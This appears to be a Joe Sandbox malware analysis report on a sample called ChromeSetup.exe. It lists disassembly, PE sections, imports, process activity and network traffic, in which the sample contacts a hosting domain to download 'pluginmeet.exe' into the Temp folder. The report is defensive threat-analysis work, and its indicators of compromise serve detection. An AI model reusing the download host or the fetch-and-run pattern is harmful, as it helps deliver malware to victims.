mov byte ptr [000C6F9Dh], 00000001h
call 00007FDC44E82D5Dh
call 00007FDC44E83818h
test al, al
jne 00007FDC44E827B6h
xor al, al
jmp 00007FDC44E827C6h
call 00007FDC44E88333h
test al, al
jne 00007FDC44E827BBh
xor ecx, ecx
call 00007FDC44E83828h
jmp 00007FDC44E8279Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000C6F64h], 00000000h
mov ebx, ecx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1fe76c	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x205000	0x8ebc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x20fc00	0x2908	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x20e000	0x4a7c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1f69c0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1f6b80	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1f6880	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x158000	0x5a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1565f0	0x156600	61a56fad548f7c37c826f870bd08048c	False	0.4832340726542534	data	6.259280508274809	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x158000	0xa7ba6	0xa7c00	e56f28cf57b2414be3f2f48d3f7910cc	False	0.32378650102459017	data	5.118815952629251	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x200000	0x4cf8	0x3a00	26596dbdb1bae1197cca1b951f644903	False	0.15699084051724138	data	2.3663921316570047	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x205000	0x8ebc	0x9000	8c03c6cbe9e31cf2f35b720d87eecede	False	0.5101996527777778	data	5.966444611469045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x20e000	0x4a7c	0x4c00	57498deab413651a341b66be0f1ae49b	False	0.43061266447368424	data	5.435187970957179	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
api-ms-win-core-synch-l1-2-0.dll	WakeByAddressSingle, WaitOnAddress, WakeByAddressAll
bcryptprimitives.dll	ProcessPrng
kernel32.dll	FlsSetValue, FlsFree, FreeConsole, FlsGetValue, GetConsoleOutputCP, HeapSize, LCMapStringW, FlsAlloc, GetCurrentProcess, DuplicateHandle, GetStringTypeW, SetStdHandle, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, SetHandleInformation, GetCommandLineA, GetModuleHandleExW, RtlPcToFileHeader, LoadLibraryExW, FreeLibrary, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, CloseHandle, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, RaiseException, CreateIoCompletionPort, EncodePointer, GetQueuedCompletionStatusEx, PostQueuedCompletionStatus, WriteFile, SetFileCompletionNotificationModes, RtlUnwindEx, Sleep, GetModuleHandleA, GetProcAddress, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, GetLastError, AddVectoredExceptionHandler, SetThreadStackGuarantee, GetCurrentThread, SwitchToThread, CreateWaitableTimerExW, SetWaitableTimer, WaitForSingleObject, QueryPerformanceCounter, GetSystemInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetLastError, GetCurrentDirectoryW, GetEnvironmentStringsW, GetEnvironmentVariableW, GetSystemTimeAsFileTime, GetCommandLineW, FlushFileBuffers, SetFileInformationByHandle, SetFilePointerEx, GetCurrentThreadId, GetStdHandle, GetCurrentProcessId, WriteFileEx, SleepEx, TerminateProcess, QueryPerformanceFrequency, HeapFree, CompareStringW, HeapReAlloc, lstrlenW, ReleaseMutex, GetProcessHeap, HeapAlloc, FindNextFileW, FindClose, CreateFileW, GetFileInformationByHandle, GetFileInformationByHandleEx, FindFirstFileW, GetFinalPathNameByHandleW, InitializeCriticalSectionAndSpinCount, CreateMutexA, GetConsoleMode, GetFileType, LoadLibraryA, GetModuleHandleW, FormatMessageW, GetModuleFileNameW, SetEnvironmentVariableW, ExitProcess, CreateNamedPipeW, ReadFileEx, GetFullPathNameW, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, CreateThread, GetTempPathW, WaitForSingleObjectEx
secur32.dll	DecryptMessage, EncryptMessage, DeleteSecurityContext, ApplyControlToken, InitializeSecurityContextW, FreeCredentialsHandle, AcquireCredentialsHandleA, FreeContextBuffer, AcceptSecurityContext, QueryContextAttributesW
advapi32.dll	RegCloseKey, RegQueryValueExW, RegOpenKeyExW
ws2_32.dll	WSASend, send, recv, shutdown, setsockopt, ioctlsocket, connect, bind, WSASocketW, getsockname, getpeername, freeaddrinfo, getsockopt, getaddrinfo, WSAGetLastError, WSAStartup, WSAIoctl, closesocket, WSACleanup
crypt32.dll	CertGetCertificateChain, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertDuplicateCertificateContext, CertDuplicateStore, CertDuplicateCertificateChain, CertFreeCertificateChain, CertCloseStore, CertOpenStore, CertAddCertificateContextToStore, CertEnumCertificatesInStore
ntdll.dll	RtlNtStatusToDosError, NtCreateFile, NtDeviceIoControlFile, NtCancelIoFileEx, NtWriteFile
user32.dll	MessageBoxW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 20:31:53.935293913 CET	49693	80	192.168.2.6	185.18.52.66
Mar 7, 2025 20:31:53.940376997 CET	80	49693	185.18.52.66	192.168.2.6
Mar 7, 2025 20:31:53.941226006 CET	49693	80	192.168.2.6	185.18.52.66
Mar 7, 2025 20:31:54.003504038 CET	49693	80	192.168.2.6	185.18.52.66
Mar 7, 2025 20:31:54.008601904 CET	80	49693	185.18.52.66	192.168.2.6
Mar 7, 2025 20:31:54.595236063 CET	80	49693	185.18.52.66	192.168.2.6
Mar 7, 2025 20:31:54.595254898 CET	80	49693	185.18.52.66	192.168.2.6
Mar 7, 2025 20:31:54.595268011 CET	80	49693	185.18.52.66	192.168.2.6
Mar 7, 2025 20:31:54.595278978 CET	80	49693	185.18.52.66	192.168.2.6
Mar 7, 2025 20:31:54.595290899 CET	80	49693	185.18.52.66	192.168.2.6
Mar 7, 2025 20:31:54.595325947 CET	49693	80	192.168.2.6	185.18.52.66
Mar 7, 2025 20:31:54.595376015 CET	49693	80	192.168.2.6	185.18.52.66
Mar 7, 2025 20:31:54.596252918 CET	49693	80	192.168.2.6	185.18.52.66
Mar 7, 2025 20:31:54.601500988 CET	80	49693	185.18.52.66	192.168.2.6
Mar 7, 2025 20:31:54.601562977 CET	49693	80	192.168.2.6	185.18.52.66

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 20:31:53.796294928 CET	51279	53	192.168.2.6	1.1.1.1
Mar 7, 2025 20:31:53.808227062 CET	53	51279	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 20:31:53.796294928 CET	192.168.2.6	1.1.1.1	0x4f7b	Standard query (0)	v128235.hostnl03.fornex.host	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 20:31:53.808227062 CET	1.1.1.1	192.168.2.6	0x4f7b	No error (0)	v128235.hostnl03.fornex.host		185.18.52.66	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:31:53.808227062 CET	1.1.1.1	192.168.2.6	0x4f7b	No error (0)	v128235.hostnl03.fornex.host		185.18.52.85	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

v128235.hostnl03.fornex.host

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49693	185.18.52.66	80	7296	C:\Users\user\Desktop\ChromeSetup.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 20:31:54.003504038 CET	81	OUT	GET /pluginmeet.exe HTTP/1.1 accept: / host: v128235.hostnl03.fornex.host
Mar 7, 2025 20:31:54.595236063 CET	1236	IN	HTTP/1.1 404 NOT FOUND Server: nginx Date: Fri, 07 Mar 2025 19:31:54 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4856 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 3a 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 74 61 74 69 63 2d 66 6f 72 6e 65 78 2d 63 75 73 74 6f 6d 2f 63 73 73 2f 62 61 73 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 20 68 65 61 64 65 72 2d 62 67 22 3e 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 2f 73 74 61 [TRUNCATED] Data Ascii: <!doctype html><html><head> <title>404: </title> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <link href="/static-fornex-custom/css/base.css" rel="stylesheet" /></head><body> <header class="header header-bg"> <div style="background-image: url('/static-fornex-custom/img/prlx-bg-main.png');" class="header-bg-image hdn-lg"></div> <div class="wrap"> <div class="header-inner"> <div class="table"> <div class="left-nav table-cell-md"> <a href="https://fornex.com/"><img src="/static-fornex-custom/img/logo.png" srcset="/static-fornex-custom/img/logo@2x.png 2x" class="logo logo-light" /></a><a href="https://fornex.com/"><img src="/static-fornex-custom/img/logo-dark.png" srcset="/static-fornex-custom/img/logo-dark@2x.png 2x" class="logo logo-dark" /></a> </div> <div class="center-nav table-cell-md hdn-lg"> [TRUNCATED]
Mar 7, 2025 20:31:54.595254898 CET	1236	IN	Data Raw: 56 50 53 2c 20 d0 b2 d1 8b d0 b4 d0 b5 d0 bb d0 b5 d0 bd d0 bd d1 8b d0 b5 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d1 8b 2c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b8 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d1 8b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: VPS, , </div> </div> <div class="table-cell-md ta-r hdn-lg"> <a href="https://fornex.com/" style="color: #fff"><span class="border bo
Mar 7, 2025 20:31:54.595268011 CET	1236	IN	Data Raw: 20 20 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 Data Ascii: <ul> <li> <a href="https://fornex.com/help/cpanel-first-steps/"> </a> </li>
Mar 7, 2025 20:31:54.595278978 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 6e 65 78 2e 63 6f 6d 2f 64 65 64 69 63 61 74 65 64 2f 22 3e d0 92 d1 8b d0 b4 d0 b5 d0 bb d0 b5 d0 bd d0 bd d1 8b d0 b5 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d1 8b Data Ascii: <a href="https://fornex.com/dedicated/"> </a> </li> <li> <a href="https://fornex.com/ssd-vps/">SSD VPS</a> </li>
Mar 7, 2025 20:31:54.595290899 CET	76	IN	Data Raw: 20 2b 3d 20 22 3f 66 72 6f 6d 3d 62 6c 6f 63 6b 65 64 2d 22 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e Data Ascii: += "?from=blocked-" + location.hostname; } </script></body></html>

Target ID:	0
Start time:	14:31:42
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\ChromeSetup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ChromeSetup.exe"
Imagebase:	0x7ff775140000
File size:	2'172'168 bytes
MD5 hash:	3DADAB41987CE43AECA0C09430F0A38A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:31:42
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68dae0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:31:55
Start date:	07/03/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7296 -s 600
Imagebase:	0x7ff719e80000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ChromeSetup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ChromeSetup.exe_6ada18b8e09e59e4341ac527b486b7b596f33d_8feb169d_ce6762b6-5b34-4f6a-b313-708b89f4b992\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7847.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7922.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7952.tmp.xml

C:\Users\user\AppData\Local\Temp\pluginmeet.exe

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
ChromeSetup.exe